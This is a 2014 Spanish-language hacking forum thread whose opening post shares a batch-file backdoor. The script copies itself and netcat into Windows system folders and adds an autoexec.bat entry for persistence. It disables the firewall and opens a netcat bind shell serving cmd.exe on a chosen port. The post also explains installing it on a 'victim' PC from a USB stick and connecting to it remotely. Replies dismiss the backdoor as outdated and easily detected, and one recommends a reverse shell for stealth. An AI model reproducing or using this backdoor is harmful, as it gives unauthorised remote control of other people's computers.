elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  El Backdoor más simple y eficiente
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: El Backdoor más simple y eficiente  (Leído 3,091 veces)
_TTFH_3500

Desconectado Desconectado

Mensajes: 123



Ver Perfil
El Backdoor más simple y eficiente
« en: 6 Junio 2014, 16:41 pm »

Compilamos el siguiente codigo con Bat2Exe PRO y elegimos la opción "Start Invisible (NO CONSOLE window)" En el codigo cambiamos "Backdoor.exe" por cualquier nombre porque sino sería muy obio y en "3500" escribimos el puerto que quieramos.

Código
  1. @echo off
  2. IF exist %windir%\[i]Backdoor.exe[/i] goto :on
  3. copy /y [i]Backdoor.exe[/i] %windir%
  4. copy /y nc.exe %windir%\System32
  5. echo start %windir%\[i]Backdoor.exe[/i]>>autoexec.bat
  6. :on
  7. netsh firewall set opmode mode=disable
  8. nc -L -d -e cmd.exe -p [b]3500[/b]
  9. pause>nul


Para acceder a la PC que tiene instalado en Backdoor escribimos en CMD:

nc -vv IPvictima PUERTO


Para instalar el Backdoor en la PC de la victima copiamos nuetro backdoor compilado y el archivo nc.exe (que una version reducida del NetCat que se puede descargar de este foro) a un Pendrive y iniciamos el Backdoor.exe, este se copiara a C:\Windows\ porque es una ubicación facíl de localizar y donde ninguna persona normal miraría y el NetCat debe estar en System32 para que se abra desde CMD al escribir nc.

IMPORTANTE: en nuestra pc en System32 tambien tenemos que tener el archivo nc.exe

« Última modificación: 6 Junio 2014, 16:55 pm por #!drvy » En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: El Backdoor más simple y eficiente
« Respuesta #1 en: 6 Junio 2014, 16:53 pm »

Re-viejo y Re-detectado
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Gh057


Desconectado Desconectado

Mensajes: 1.190



Ver Perfil
Re: El Backdoor más simple y eficiente
« Respuesta #2 en: 6 Junio 2014, 17:05 pm »

... este se copiara a C:\Windows\ porque es una ubicación facíl de localizar y donde ninguna persona normal miraría y el NetCat debe estar en System32 para que se abra desde CMD al escribir nc...
:rolleyes:
En línea

4 d0nd3 1r4 3l gh057? l4 r3d 3s 74n v4s74 3 1nf1n1t4...
Vaagish


Desconectado Desconectado

Mensajes: 875



Ver Perfil
Re: El Backdoor más simple y eficiente
« Respuesta #3 en: 6 Junio 2014, 19:36 pm »

No hay manera que no lo detecte un AV.. inclusive sin tener uno instalado  :xD
En línea

daryo


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: El Backdoor más simple y eficiente
« Respuesta #4 en: 6 Junio 2014, 21:23 pm »

si casi todas las versiones de netcat son detectadas . hacer una shell inversa con cualquier lenguaje de programacion es sencillo y es mucho mas indetectable xD.

ademas eso de desactivar  por consola a el firewall no funciona amenos que se tengan permisos de admin :)
En línea

buenas
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
manera mas eficiente de ...
PHP
pedraxito 5 2,528 Último mensaje 1 Agosto 2007, 10:03 am
por Sanjuu
Código más eficiente « 1 2 »
Programación C/C++
prometheus48 18 8,173 Último mensaje 4 Enero 2012, 06:06 am
por ace332
Es eficiente usar #define
Programación C/C++
anonimo12121 5 2,881 Último mensaje 3 Octubre 2012, 14:14 pm
por anonimo12121
Bruselas exige el uso eficiente de energía en televisores y monitores
Noticias
wolfbcn 1 1,072 Último mensaje 19 Noviembre 2014, 16:00 pm
por ccrunch
¿Es de verdad la seguridad de OVH eficiente?
Redes
nevachana 0 1,471 Último mensaje 9 Agosto 2015, 11:51 am
por nevachana
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines